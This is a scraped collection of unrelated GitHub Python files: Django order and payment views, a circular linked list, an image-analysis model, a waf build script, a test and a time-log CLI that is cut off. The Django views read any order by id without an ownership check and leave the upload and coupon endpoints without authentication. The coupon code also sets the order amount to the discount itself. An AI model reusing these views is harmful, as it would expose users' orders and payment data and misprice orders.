CustomUserSerializer(user)\n return Response({'user': user_serializer.data})\n\n\n\nclass OrdersHistoryList(APIView):\n permission_classes = [IsAuthenticated]\n \n def get(self, request):\n orders = Order.objects.filter(user=request.user).order_by('-created_at')[:3]\n serializer = OrdersListSerializer(orders, many=True) \n return Response(serializer.data)\n\n\nclass OrderDetailView(APIView):\n permission_classes = [IsAuthenticated]\n\n def get(self, request, order_id):\n try:\n order = Order.objects.get(id=order_id)\n serializer = OrdersListSerializer(order)\n return Response(serializer.data)\n except Order.DoesNotExist:\n return Response({'error': 'Order not found'}, status=404)\n \n \n\nclass AccountTypeList(APIView): \n def get(self, request):\n account_types = AccountType.objects.all()\n serializer = AccountTypeSerializer(account_types, many=True)\n return Response(serializer.data)\n\n\nclass CheckAccountType(APIView):\n def get(self, request, path):\n try: \n account_type = AccountType.objects.get(amount=path)\n serializer = AccountTypeSerializer(account_type)\n return Response(serializer.data)\n except AccountType.DoesNotExist:\n return Response(\n {\"error\": \"Account type not found\"},\n status=status.HTTP_404_NOT_FOUND\n )\n\n\nclass PlatformsList(APIView): \n def get(self, request):\n platform = Platform.objects.all()\n serializer = PlatformSerializer(platform, many=True)\n return Response(serializer.data)\n\n\n\n\n\n\n\nclass CreateOrder(generics.CreateAPIView):\n queryset = Order.objects.all()\n serializer_class = OrderSerializer\n\n def create(self, request, *args, **kwargs):\n try:\n # Extract the amount and user id from the POST request data\n amount = request.data.get('amount').lower()\n user_id = request.data.get('user')\n paymentMethod = request.data.get('paymentMethod').lower()\n notes = request.data.get('notes')\n currency = request.data.get('currency') \n\n # Initialize serializers\n payment_details_serializer = None\n transaction_serializer = None\n order_serializer = None\n\n # Try to get the PaymentMethod and AccountType objects\n payment_method = get_object_or_404(PaymentMethod, name=paymentMethod)\n account_type = get_object_or_404(AccountType, starting_balance=amount) \n user_instance = CustomUser.objects.get(id=user_id)\n \n\n print(\"user_instance\", user_instance.email)\n\n # Create payment details data based on paymentMethod\n if paymentMethod == 'bank-transfer':\n payment_details_data = {'payment_proof': \"None\"} \n elif paymentMethod == 'cyrptocurrency':\n payment_details_data = {'crypto_gateway': \"None\"} \n elif paymentMethod == 'paystack':\n payment_details_data = {'reference': \"None\"} \n elif paymentMethod == 'card_type':\n payment_details_data = {'payment_proof': \"None\"} \n \n # Create PaymentDetailsSerializer\n payment_details_serializer = PaymentDetailsSerializer(data=payment_details_data)\n\n if payment_details_serializer.is_valid():\n print(\"payment_details_serializer.is_valid():\")\n payment_details = payment_details_serializer.save()\n\n transaction_data = {\n 'amount': account_type.setup_fee,\n 'currency': currency,\n 'payment_details': payment_details.id\n } \n transaction_serializer = TransactionSerializer(data=transaction_data)\n else:\n print(\"payment_details_serializer.errors\", payment_details_serializer.errors)\n return Response(payment_details_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n print(payment_details.id)\n\n if transaction_serializer.is_valid():\n print(\"transaction_serializer.is_valid():\")\n transaction = transaction_serializer.save()\n\n order_data = {\n 'account_type': account_type.id,\n 'amount': account_type.setup_fee,\n 'user': user_id,\n 'transaction': transaction.id,\n 'payment_method': payment_method.id,\n 'additional_notes': notes \n }\n\n # Create OrderSerializer\n order_serializer = OrderSerializer(data=order_data)\n\n if order_serializer.is_valid(): \n \n order = order_serializer.save() \n context = {\n 'user': user_instance.email, 'amount': account_type.starting_balance,\n 'payment_method': payment_method.name, 'setup_fee': account_type.setup_fee,\n 'status': transaction.status \n }\n \n print(context)\n # Render the HTML email template\n email_subject = \"New Order Notification\"\n email_body = render_to_string('order/order_confirm.html', context)\n \n \n send_mail(\n email_subject,\n email_body,\n settings.DEFAULT_FROM_EMAIL, # Sender's email address\n [order.user.email], # Recipient's email address (user's email)\n fail_silently=False, # Set to True to suppress exceptions if sending fails\n html_message=email_body, # Set the HTML content here\n )\n \n # Render the HTML email template\n email_subject_admin = \"@admin: New Order Notification\"\n email_body_admin = render_to_string('order/order_confirm.html', context)\n \n send_mail(\n email_subject_admin,\n email_body_admin,\n settings.DEFAULT_FROM_EMAIL, # Sender's email address\n [settings.ADMIN_EMAILS], # Recipient's email address (user's email)\n fail_silently=False, # Set to True to suppress exceptions if sending fails\n html_message=email_body_admin, # Set the HTML content here\n )\n return Response(order_serializer.data, status=status.HTTP_201_CREATED)\n else:\n payment_details.delete()\n transaction.delete()\n print(\"order_serializer.errors\", order_serializer.errors)\n return Response(order_serializer.errors, status=status.HTTP_400_BAD_REQUEST) \n else:\n print(\"transaction_serializer.errors\", transaction_serializer.errors)\n return Response(transaction_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n except Exception as e:\n print(\"An error occurred in EXCEPT:\", str(e))\n return Response({\"error\": \"An error occurred\"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n\nimport os\nimport base64\nfrom django.http import Http404\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .models import Order\nfrom .serializers import OrderSerializer\n\n\nclass PaymentProofUploadAPIView(APIView):\n ALLOWED_EXTENSIONS = {'.png', '.jpg', '.jpeg', '.pdf'}\n\n def post(self, request, order_id, format=None):\n try:\n # Retrieve the Order object based on the orderId from the URL path\n order = get_object_or_404(Order, id=order_id)\n except Order.DoesNotExist:\n raise Http404(\"Order does not exist\")\n \n # Check if a file was uploaded in the request\n if 'file' not in request.FILES:\n return Response({'error': 'No file uploaded'}, status=status.HTTP_400_BAD_REQUEST)\n\n print(request.FILES)\n \n uploaded_file = request.FILES['file']\n file_name, file_extension = os.path.splitext(uploaded_file.name)\n file_extension = file_extension.lower()\n\n # Check if the file extension is allowed\n if file_extension not in self.ALLOWED_EXTENSIONS:\n return Response({'error': 'Invalid file type. Please upload a .docx, .png, .jpg, .jpeg, or .pdf file.'}, status=status.HTTP_400_BAD_REQUEST)\n\n # Convert the file content to a string (you may need to adjust this based on the file type)\n file_content = uploaded_file.read()\n encoded_file = base64.b64encode(file_content).decode('utf-8')\n encoded_data = f\"data:{uploaded_file.content_type};base64,{encoded_file}\" \n\n transaction = order.transaction\n payment_details = transaction.payment_details\n payment_details.payment_proof = encoded_data\n payment_details.save()\n\n # Serialize the updated Order object\n serializer = OrdersListSerializer(order)\n print(order.user.email)\n \n # Render the HTML email template\n # email_subject = \"Order Update Notification\"\n # email_body = render_to_string('order/order_update.html', {'user': order.user, 'order': order})\n # # print(email_body)\n \n # send_mail(\n # email_subject,\n # email_body,\n # settings.DEFAULT_FROM_EMAIL, # Sender's email address\n # [order.user.email], # Recipient's email address (user's email)\n # fail_silently=False, # Set to True to suppress exceptions if sending fails\n # html_message=email_body, # Set the HTML content here\n # )\n\n # Render the HTML email template\n email_subject_admin = \"@admin: Order update Notification\"\n email_body_admin = render_to_string('order/order_update.html', {'user': order.user, 'order': order})\n \n send_mail(\n email_subject_admin,\n email_body_admin,\n settings.DEFAULT_FROM_EMAIL, # Sender's email address\n [settings.ADMIN_EMAILS], # Recipient's email address (user's email)\n fail_silently=False, # Set to True to suppress exceptions if sending fails\n html_message=email_body_admin, # Set the HTML content here\n ) \n \n return Response(serializer.data, status=status.HTTP_200_OK)\n\n \n\n\n\n\ndef ValidateCoupon(request):\n if request.method == 'POST':\n # print(request.POST)\n coupon_code = request.POST.get('coupon_code')\n order_id = request.POST.get('order_id') \n \n try:\n coupon = Coupon.objects.get(code=coupon_code)\n except Coupon.DoesNotExist:\n return JsonResponse({'error': 'Invalid coupon code'})\n \n \n if not coupon.is_valid():\n return JsonResponse({'error': 'Coupon has expired'}) \n order = Order.objects.get(id=order_id)\n \n \n account_type = AccountType.objects.get(pk=order.account_type.id)\n # print(account_type.price)\n \n # total_price = order.get_total() account_type.price \n \n discount = coupon.discount / 100\n total_price = account_type.price\n discounted_amount = round(total_price * discount, 2)\n \n order = Order.objects.get(id=order_id)\n order.amount = discounted_amount\n # order.quantity = quantity\n order.coupon = coupon\n order.coupon_applied = True\n order.save()\n \n # discounted_price = round(total_price - discounted_amount, 2)\n # print(discounted_price)\n \n coupon.expiry_date = timezone.now() - timedelta(days=1) # set expiry date to a past date\n coupon.save() \n \n # except:\n # print(\"Error adding coupon to order\")\n return JsonResponse({'discounted_price': discounted_amount})\n \n","repo_name":"Aremu-damilare/Lasfundiing-backend","sub_path":"store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9605993966","text":"class Node:\n def __init__(self,data):\n self.data = data\n self.next = None\n \nclass Circular_Linked_List:\n def __init__(self):\n self.head = None\n \n def push(self, data):\n new_node = Node(data)\n temp = self.head\n \n new_node.next = self.head\n #if linked list is not none then set the next of last node\n \n if self.head is not None:\n while(temp.next != self.head):\n temp = temp.next\n temp.next = new_node\n else:\n new_node.next = new_node\n \n self.head = new_node\n \n \n def print_list(self):\n temp = self.head\n while temp.next != self.head:\n print(temp.data)\n temp = temp.next\n print(temp.data)\n \n \n \n \ncll = Circular_Linked_List()\ncll.push(\"10\")\ncll.push(\"9\")\ncll.push(\"6\")\ncll.push(\"3\")\ncll.print_list()\n","repo_name":"neelsave/DataStructuresAndAlgorithms","sub_path":"circular_linked_list.py","file_name":"circular_linked_list.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20756907461","text":"from pathlib import Path # File system non-native OOP abstraction\nimport imghdr\nimport imageio\nfrom main_log import logging, MainLogger\nimport numpy as np\nfrom data_preprocessor import DataPreprocessor\nfrom matplotlib import pyplot as plt\nfrom multiprocessing import Value, Queue\nfrom model_worker import ModelWorker\n\nMainLogger.module_set.add(__name__)\n\n\nclass Model:\n chi_str = f'chi'\n stderr_str = f'stderr'\n rmse_str = f'rmse'\n exponents_str = f'exponents'\n\n def __init__(self, log_queue: Queue, log_level: int):\n self._supported_file_types = ['tiff']\n self._is_file_loaded = False\n self._raw_images = None\n self._tensor_stack = []\n self._intensity_threshold = 0\n self._output_nan_replacement = {Model.stderr_str: 0,\n Model.rmse_str: 0,\n Model.exponents_str: 0,\n Model.chi_str: 0}\n self._log_queue = log_queue\n self.log_level = log_level\n self.logger = logging.getLogger(__name__)\n self.logger.setLevel(self.log_level)\n\n @staticmethod\n def analyze_images(worker_args: tuple, log_queue: Queue, pb_value: Value, verbose_analysis: Value):\n from os import getpid\n worker = ModelWorker(*worker_args, log_queue)\n worker.analyze_images(pb_value, verbose_analysis)\n\n @staticmethod\n def display_first_n_pixel_histograms(worker_args: tuple, log_queue: Queue, n: int):\n worker = ModelWorker(*worker_args, log_queue)\n worker.show_pixel_histogram(n)\n\n def set_nan_replacement(self, output_type: str, nan_replacement: int):\n if output_type in self._output_nan_replacement:\n self.logger.info(f'Setting {output_type} nan replacement value, '\n f'old={str(self._output_nan_replacement[output_type])}'\n f' new={nan_replacement}')\n self._output_nan_replacement[output_type] = nan_replacement\n\n def clear_model(self):\n self._is_file_loaded = False\n self._raw_images = None\n self._tensor_stack = []\n self._intensity_threshold = 0\n self._output_nan_replacement = {Model.rmse_str: 0,\n Model.exponents_str: 0,\n Model.chi_str: 0,\n Model.stderr_str: 0}\n\n def __set_file_loaded(self, is_file_loaded: bool):\n self.logger.debug(f'Setting file_loaded flag ')\n self._is_file_loaded = is_file_loaded\n\n def set_intensity_threshold(self, threshold: int):\n self.logger.info(f'Setting intensity threshold. old={self._intensity_threshold}, new={threshold}')\n self._intensity_threshold = threshold\n\n def load_data(self, input_file_path: str) -> bool:\n success: bool = False\n if not self.__is_input_file_valid(input_file_path):\n self.logger.warning('Attempt to load an invalid file, ignoring')\n else:\n try:\n self._raw_images = imageio.volread(uri=input_file_path)\n self.logger.info(f'Loaded {len(self._raw_images)} x '\n f'{self._raw_images[0].shape} {imghdr.what(input_file_path)} images')\n self._tensor_stack.append(self._raw_images.copy())\n self.__set_file_loaded(True)\n success = True\n except Exception as e:\n self.__set_file_loaded(False)\n self.logger.info(f'Caught exception when running:\\n{e}')\n return success\n\n def __is_input_file_valid(self, input_file_path: str) -> bool:\n self.logger.info(f'Validating input file')\n valid = False\n try:\n input_file = Path(input_file_path)\n except Exception as e:\n self.logger.info(f'Caught exception when processing path:\\n{e}')\n return valid\n\n if not input_file.exists:\n self.logger.warning(f'Input path leads to an non-existing file')\n return valid\n\n if not input_file.is_file():\n self.logger.warning(f'Input path does not lead to a file')\n return valid\n\n try:\n file_type = imghdr.what(input_file_path)\n except Exception as e:\n self.logger.info(f'Caught exception when reading input file binary header:\\n{e}')\n return valid\n\n if file_type not in self._supported_file_types:\n self.logger.warning(f'{file_type} is an unsupported file type')\n return valid\n\n self.logger.info(f'Input file is valid')\n valid = True\n return valid\n\n def valid_for_conv_filter(self, kernel_size):\n if len(self._tensor_stack[0]) == 0:\n return False\n image_shape = self._tensor_stack[-1][0].shape\n max_dim = max(image_shape)\n if kernel_size > max_dim:\n return False\n else:\n return True\n\n def valid_for_block_reduce(self, block_size):\n if len(self._tensor_stack[0]) == 0:\n return False\n image_shape = self._tensor_stack[-1][0].shape\n for dim in image_shape:\n if not (dim % block_size) == 0:\n return False\n return True\n\n def apply_block_reduce(self, reduce_type, block_size):\n if len(self._tensor_stack) > 0:\n self.logger.info(f'Applying {reduce_type} pooling, block size: {str(block_size)}')\n dp = DataPreprocessor(self._tensor_stack[-1], self._log_queue, self.log_level)\n dp.apply_block_reduce(reduce_type, block_size)\n self._tensor_stack.append(dp.get_processed_images())\n else:\n self.logger.error(f'Tensor stack is empty')\n\n def apply_filter(self, filter_type: str, kernel_shape: tuple):\n if len(self._tensor_stack) > 0:\n dp = DataPreprocessor(self._tensor_stack[-1], self._log_queue, self.log_level)\n if filter_type == 'median':\n dp.apply_median_filter(kernel_shape)\n elif filter_type == 'uniform':\n dp.apply_uniform_filter(kernel_shape)\n elif filter_type == 'gaussian':\n dp.apply_gaussian_filter(kernel_shape)\n else:\n self.logger.error(f'Unknown filter type {filter_type}')\n return\n self._tensor_stack.append(dp.get_processed_images())\n else:\n self.logger.error(f'Tensor stack is empty')\n\n def display_images(self):\n if len(self._tensor_stack) > 1:\n images = self._tensor_stack[-1]\n figure_data = []\n for i in range(len(images)):\n f, figure_axis = plt.subplots(1, 2)\n\n figure_axis[0].imshow(self._raw_images[i])\n figure_axis[0].set_title('Raw')\n\n figure_axis[1].imshow(images[i])\n figure_axis[1].set_title('Filtered')\n figure_data.append((f, figure_axis))\n f.suptitle(f'Image {i + 1} Before/After')\n plt.show()\n\n elif len(self._tensor_stack) == 1:\n images = self._tensor_stack[-1]\n figure_data = []\n for i in range(len(images)):\n f, figure_axis = plt.subplots(1, 1)\n figure_axis.imshow(self._raw_images[i])\n figure_axis.set_title(f'Raw image {i+1}')\n figure_data.append((f, figure_axis))\n plt.show()\n\n def discard_top_tensor(self):\n prev_size = len(self._tensor_stack)\n self._tensor_stack.pop()\n cur_size = len(self._tensor_stack)\n self.logger.info(f'Discarded top tensor from the tensor stack, stack size: (prev={prev_size}, cur={cur_size})')\n\n def get_tensor_stack_size(self) -> int:\n return len(self._tensor_stack)\n\n def get_top_images(self) -> np.ndarray:\n if len(self._tensor_stack) > 0:\n return self._tensor_stack[-1]\n else:\n return np.zeros(shape=(1, 1, 1))\n\n def get_intensity_threshold(self) -> int:\n return self._intensity_threshold\n\n def get_nan_replacements(self) -> dict:\n return self._output_nan_replacement\n\n def save_top_images(self, name: str):\n images = self._tensor_stack[-1]\n imageio.mimwrite(name, images, bigtiff=False)\n\n","repo_name":"geekazaurus/fret_utility","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6608898295","text":"#! /usr/bin/env python\n\nimport sys, re, os\nimport waf_dynamo\nimport Task, Utils\nfrom TaskGen import taskgen, feature, after, before\n\nVERSION='0.1'\nAPPNAME='extender'\n\nsrcdir = '.'\nblddir = 'build'\n\ndef append_yaml(task):\n path = task.outputs[0].bldpath(task.env)\n with open(path, 'wb') as out_f:\n for i in task.inputs:\n with open(i.abspath(), 'rb') as in_f:\n data = in_f.read();\n out_f.write(data)\n\n digest = Utils.h_file(path)\n for i in task.inputs:\n task.generator.bld.node_sigs[i.variant(task.env)][i.id] = digest\n return 0\n\ntask = Task.task_type_from_func('merge_yaml',\n func = append_yaml,\n color = 'PINK',\n before = 'cc cxx')\n@taskgen\n@feature('merge_yaml')\ndef feature_merge_yaml(self):\n inputs = []\n for name in self.yaml_source:\n i = self.path.find_or_declare(name)\n inputs.append(i)\n\n out = self.path.find_or_declare([self.yaml_target])\n\n task = self.create_task('merge_yaml')\n task.set_inputs(inputs)\n task.set_outputs(out)\n\ndef init():\n pass\n\ndef set_options(opt):\n opt.tool_options('waf_dynamo')\n\ndef configure(conf):\n conf.check_tool('waf_dynamo')\n\ndef build(bld):\n\n private_platforms = ('nx64', 'ps4')\n\n source = ['build.yml']\n for platform in private_platforms:\n private_source = 'build_%s.yml' % platform\n if os.path.exists(private_source):\n source += [private_source]\n\n bld.new_task_gen(features = 'merge_yaml',\n yaml_source = source,\n yaml_target = 'build.yml',\n name='Build Yaml')\n\n variants = ('debug', 'release', 'headless')\n for variant in variants:\n source = ['variants/%s.appmanifest' % variant]\n for platform in private_platforms:\n private_source = 'variants/%s_%s.appmanifest' % (variant, platform)\n if os.path.exists(private_source):\n source += [private_source]\n\n bld.new_task_gen(features = 'merge_yaml',\n yaml_source = source,\n yaml_target = source[0],\n name='Build Yaml %s' % variant)\n\n bld.add_group()\n bld.install_files('${PREFIX}/extender', 'build.yml')\n bld.install_files('${PREFIX}/extender/variants', 'variants/debug.appmanifest')\n bld.install_files('${PREFIX}/extender/variants', 'variants/release.appmanifest')\n bld.install_files('${PREFIX}/extender/variants', 'variants/headless.appmanifest')\n\ndef shutdown():\n pass\n","repo_name":"cocos3ds/defold","sub_path":"share/extender/wscript","file_name":"wscript","file_ext":"","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"9392087857","text":"from argparse import ArgumentParser\nimport unittest\nfrom unittest.mock import patch\n\nfrom geoalchemy2 import load_spatialite\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.event import listen\nfrom sqlalchemy.orm import Session\n\nfrom vipersci.vis.db import Base\nfrom vipersci.vis.db import create_vis_dbs as cvd\n\n\nclass TestParser(unittest.TestCase):\n def test_arg_parser(self):\n p = cvd.arg_parser()\n self.assertIsInstance(p, ArgumentParser)\n # self.assertRaises(SystemExit, p.parse_args)\n d = vars(p.parse_args([]))\n self.assertIn(\"dburl\", d)\n\n\nclass TestDatabase(unittest.TestCase):\n def setUp(self) -> None:\n self.engine = create_engine(\"sqlite:///:memory:\")\n listen(self.engine, \"connect\", load_spatialite)\n self.session = Session(self.engine)\n\n def tearDown(self):\n Base.metadata.drop_all(self.engine)\n\n def test_main(self):\n pa_ret_val = cvd.arg_parser().parse_args([\"-d\", \"foo\"])\n with patch(\"vipersci.vis.db.create_vis_dbs.arg_parser\") as parser:\n parser.return_value.parse_args.return_value = pa_ret_val\n with patch(\n \"vipersci.vis.db.create_vis_dbs.create_engine\", return_value=self.engine\n ):\n cvd.main()\n","repo_name":"NeoGeographyToolkit/vipersci","sub_path":"tests/test_create_vis_dbs.py","file_name":"test_create_vis_dbs.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26769458267","text":"#!/usr/bin/env python3\r\n\r\nimport datetime\r\nimport os\r\n\r\nfrom collections import OrderedDict\r\nfrom peewee import *\r\n\r\n\r\ndb = SqliteDatabase('record.db')\r\nNAMES = []\r\nRECORD = []\r\nLETTERS = 'abcdefghijklmnopqrstuvwxyz '\r\n\r\n\r\nclass Entry(Model):\r\n \"\"\"Entry Model\"\"\"\r\n timestamp = DateTimeField(default=datetime.date.today)\r\n name = CharField(max_length=100)\r\n task = CharField(max_length=255)\r\n time = IntegerField()\r\n notes = TextField(default='')\r\n\r\n class Meta:\r\n database = db\r\n\r\n\r\ndef init():\r\n \"\"\"Initialize\"\"\"\r\n db.connect()\r\n db.create_tables([Entry], safe=True)\r\n db.close()\r\n\r\n\r\ndef clear_screen():\r\n \"\"\"Clear screen\"\"\"\r\n os.system('cls' if os.name == 'nt' else 'clear')\r\n\r\n\r\ndef check(prompt, boolean=None):\r\n \"\"\"Check the correct input\"\"\"\r\n while True:\r\n clear_screen()\r\n if prompt == 'time':\r\n try:\r\n clear_screen()\r\n print('Enter time spent on task')\r\n time = int(input('>').strip())\r\n if not time:\r\n clear_screen()\r\n print('You must fill this field!')\r\n continue\r\n return time\r\n except ValueError:\r\n clear_screen()\r\n print('JUST NUMBERS!!')\r\n elif prompt == 'name':\r\n clear_screen()\r\n if boolean:\r\n print('Enter {}'.format(prompt))\r\n name = input('>').strip()\r\n if not name:\r\n clear_screen()\r\n print('You must provide a name!')\r\n continue\r\n else:\r\n print('Enter first{}'.format(prompt))\r\n first_name = input('>').strip().capitalize()\r\n print('Enter last{}'.format(prompt))\r\n last_name = input('>').strip().capitalize()\r\n if not first_name or not last_name:\r\n clear_screen()\r\n print('You must fill this field!')\r\n continue\r\n if not first_name and not last_name:\r\n clear_screen()\r\n print('You must fill these fields!')\r\n continue\r\n name = first_name + ' ' + last_name\r\n\r\n # CHECK AGAIN THE CONTINUITY OF WRONG INPUT!!\r\n if [x for x in name if x.lower() not in LETTERS]:\r\n clear_screen()\r\n print('JUST ALPHABET LETTERS!')\r\n else:\r\n return name\r\n elif prompt == 'task':\r\n clear_screen()\r\n print('Enter {}'.format(prompt))\r\n task = input('>').strip()\r\n if not task:\r\n clear_screen()\r\n print('You must fill this field!')\r\n continue\r\n return task\r\n\r\n\r\ndef check_date():\r\n \"\"\"Checks date\"\"\"\r\n while True:\r\n clear_screen()\r\n try:\r\n m, d, y = input('Enter date(MM/DD/YYYY):\\n>').split('/')\r\n return datetime.date(year=int(y), month=int(m), day=int(d))\r\n except ValueError:\r\n clear_screen()\r\n print('Enter a valid date!')\r\n\r\n\r\ndef get_option(poz, entry, name=None):\r\n \"\"\"The result menu options, removes the not wanted option \"\"\"\r\n if name:\r\n prompt = ['[P]revious', '[N]ext', '[E]nter', '[R]eturn to menu']\r\n else:\r\n prompt = ['[P]revious', '[N]ext', '[E]dit', '[D]elete', '[R]eturn to menu']\r\n if poz == 0:\r\n prompt.remove('[P]revious')\r\n if poz == len(entry) - 1:\r\n prompt.remove('[N]ext')\r\n return prompt\r\n\r\n\r\ndef add_entry():\r\n \"\"\"Add new record\"\"\"\r\n clear_screen()\r\n name = check('name')\r\n task = check('task')\r\n time = check('time')\r\n print('Enter additional notes(Optional)')\r\n notes = input('>').strip()\r\n # noinspection PyBroadException\r\n try:\r\n Entry.create(name=name,\r\n task=task,\r\n time=time,\r\n notes=notes)\r\n print(\"Record successfully saved!\")\r\n except Exception:\r\n pass\r\n\r\n\r\ndef update_entry(query, index):\r\n \"\"\"Get new input for each field and save it\"\"\"\r\n timestamp = query.timestamp.strftime('%B %d, %Y')\r\n clear_screen()\r\n print('{}\\n'\r\n 'Old employee name: {}\\n'\r\n 'Old task name: {}\\n'\r\n 'Old time spent: {}\\n'\r\n 'Old notes: {}'.format(timestamp,\r\n query.name,\r\n query.task,\r\n query.time,\r\n query.notes))\r\n new_timestamp = check_date()\r\n new_name = check('name')\r\n new_task = check('task')\r\n new_time = check('time')\r\n new_notes = input('Enter notes(Optional): \\n>').strip()\r\n new_record = Entry.get(name=query.name,\r\n timestamp=query.timestamp,\r\n task=query.task,\r\n time=query.time,\r\n notes=query.notes)\r\n new_record.timestamp = new_timestamp\r\n new_record.name = new_name\r\n new_record.task = new_task\r\n new_record.time = new_time\r\n new_record.notes = new_notes\r\n new_record.save()\r\n RECORD.pop(index)\r\n entry = Entry.get(name=new_name,\r\n timestamp=new_timestamp,\r\n task=new_task,\r\n notes=new_notes)\r\n RECORD.insert(index, entry)\r\n # if query.name != new_name:\r\n # NAMES.remove(query.name)\r\n print('New record saved!')\r\n\r\n\r\ndef remove_entry(query):\r\n \"\"\"Delete instance from query\"\"\"\r\n Entry.delete_instance(query)\r\n\r\n\r\ndef validate(query):\r\n \"\"\"Checks if query exist, if is populates the RECORD list\"\"\"\r\n RECORD.clear()\r\n if not query:\r\n print(\"Record doesn't exist!\")\r\n for x in query:\r\n RECORD.append(x)\r\n if len(RECORD) != 0:\r\n result_menu()\r\n\r\n\r\ndef search_by_date():\r\n \"\"\"Search by date\"\"\"\r\n query = check_date()\r\n return_value = Entry.select().where(Entry.timestamp.contains(query))\r\n validate(return_value)\r\n\r\n\r\ndef search_by_date_range():\r\n \"\"\"Search by date range\"\"\"\r\n start = check_date() - datetime.timedelta(days=1)\r\n end = check_date() + datetime.timedelta(days=1)\r\n return_value = Entry.select().where(Entry.timestamp.between(start, end))\r\n validate(return_value)\r\n\r\n\r\ndef search_employee_name():\r\n \"\"\"Search employee name\"\"\"\r\n NAMES.clear()\r\n RECORD.clear()\r\n query = check('name', True)\r\n return_value = Entry.select().where(Entry.name.contains(query))\r\n if not return_value:\r\n print(\"Record doesn't exist!\")\r\n for x in return_value:\r\n if x.name in NAMES:\r\n continue\r\n else:\r\n NAMES.append(x.name)\r\n if len(NAMES) != 0:\r\n name_list_menu()\r\n\r\n\r\ndef search_task_name():\r\n \"\"\"Search task name\"\"\"\r\n query = input('Search for task: \\n>')\r\n return_value = Entry.select().where(Entry.task.contains(query))\r\n validate(return_value)\r\n\r\n\r\ndef search_time_spent():\r\n \"\"\"Search time spent\"\"\"\r\n query = check('time')\r\n return_value = Entry.select().where(Entry.time == query)\r\n validate(return_value)\r\n\r\n\r\ndef search_notes():\r\n \"\"\"Search notes\"\"\"\r\n query = input('Search for notes: \\n>')\r\n return_value = Entry.select().where(Entry.notes.contains(query))\r\n validate(return_value)\r\n\r\n\r\ndef name_list_menu():\r\n \"\"\"Name list\"\"\"\r\n action = None\r\n index = len(NAMES) - len(NAMES)\r\n while action != 'r':\r\n clear_screen()\r\n if len(NAMES) == 1:\r\n index = 0\r\n if len(NAMES) == 0:\r\n break\r\n print_bar = '=' * (15 + len(NAMES[index]))\r\n print(print_bar)\r\n print('Employee name: {}'.format(NAMES[index]))\r\n print(print_bar)\r\n print('Result {} of {}\\n'.format(index + 1, len(NAMES)))\r\n print(' '.join(get_option(index, NAMES, True)))\r\n action = input('>').lower().strip()\r\n if action not in ['p', 'n', 'e', 'r']:\r\n print('Choose from the available letters!')\r\n continue\r\n if (index + 1) == 1 and action == 'p':\r\n print('Choose from the available letters!')\r\n continue\r\n if (index + 1) == len(NAMES) and action == 'n':\r\n print('Choose from the available letters!')\r\n continue\r\n if action == 'p':\r\n clear_screen()\r\n index -= 1\r\n if action == 'n':\r\n clear_screen()\r\n index += 1\r\n if action == 'e':\r\n clear_screen()\r\n RECORD.clear()\r\n entries = Entry.select()\\\r\n .where(Entry.name.contains(NAMES[index]))\r\n for x in entries:\r\n RECORD.append(x)\r\n result_menu()\r\n if index == 1:\r\n index += 1\r\n if index == len(NAMES):\r\n index -= 1\r\n continue\r\n\r\n\r\ndef result_menu():\r\n \"\"\"Shows the searched entries one by one with detailed description,\r\n Navigation included\"\"\"\r\n action, index = None, 0\r\n prompt = 'Choose from the available letters!'\r\n while action != 'r':\r\n clear_screen()\r\n if len(RECORD) == 1:\r\n index = 0\r\n timestamp = RECORD[index].timestamp.strftime('%B %d, %Y')\r\n print('=' * len(timestamp))\r\n print('{}\\n'\r\n 'Employee name: {}\\n'\r\n 'Task name: {}\\n'\r\n 'Time spent: {}\\n'\r\n 'Notes: {}'.format(timestamp,\r\n RECORD[index].name,\r\n RECORD[index].task,\r\n RECORD[index].time,\r\n RECORD[index].notes))\r\n print('=' * (len(RECORD[index].notes) + 7) + '\\n')\r\n print('Result {} of {}'.format(index + 1, len(RECORD)))\r\n print(' '.join(get_option(index, RECORD)))\r\n action = input('>').lower().strip()\r\n if action not in ['p', 'n', 'e', 'd', 'r']:\r\n clear_screen()\r\n print(prompt)\r\n continue\r\n if (index + 1) == 1 and action == 'p':\r\n print(prompt)\r\n continue\r\n if (index + 1) == len(RECORD) and action == 'n':\r\n print(prompt)\r\n continue\r\n if action == 'n':\r\n clear_screen()\r\n index += 1\r\n if action == 'p':\r\n clear_screen()\r\n index -= 1\r\n if action == 'e':\r\n clear_screen()\r\n update_entry(RECORD[index], index)\r\n continue\r\n if action == 'd':\r\n clear_screen()\r\n if input(\"Are you sure? [y/N] \").lower() == 'y':\r\n remove_entry(RECORD[index])\r\n name = RECORD[index].name\r\n RECORD.pop(index)\r\n if index == 1:\r\n index += 1\r\n if index == len(RECORD):\r\n index -= 1\r\n if len(RECORD) == 0 and len(NAMES) != 0:\r\n NAMES.remove(name)\r\n break\r\n if len(RECORD) == 0:\r\n break\r\n print('Record deleted!')\r\n continue\r\n\r\n\r\ndef sub_menu():\r\n \"\"\"Search records\"\"\"\r\n action = None\r\n while action != 'g':\r\n clear_screen()\r\n if len(Entry.select()) == 0:\r\n break\r\n for key, value in s_menu.items():\r\n print(' {}] {}'.format(key, value.__doc__))\r\n print(' g] Return to menu')\r\n action = input('>').lower().strip()\r\n if action in s_menu:\r\n clear_screen()\r\n s_menu[action]()\r\n\r\n\r\ndef main_menu():\r\n \"\"\"Show the menu\"\"\"\r\n init()\r\n action = None\r\n while action != 'q':\r\n clear_screen()\r\n length = len(Entry.select())\r\n if length == 1:\r\n plural = ''\r\n else:\r\n plural = 's'\r\n print(' {} record{} in record.db.\\n'.format(length, plural))\r\n for key, value in menu.items():\r\n print(' {}] {}'.format(key, value.__doc__))\r\n print(' 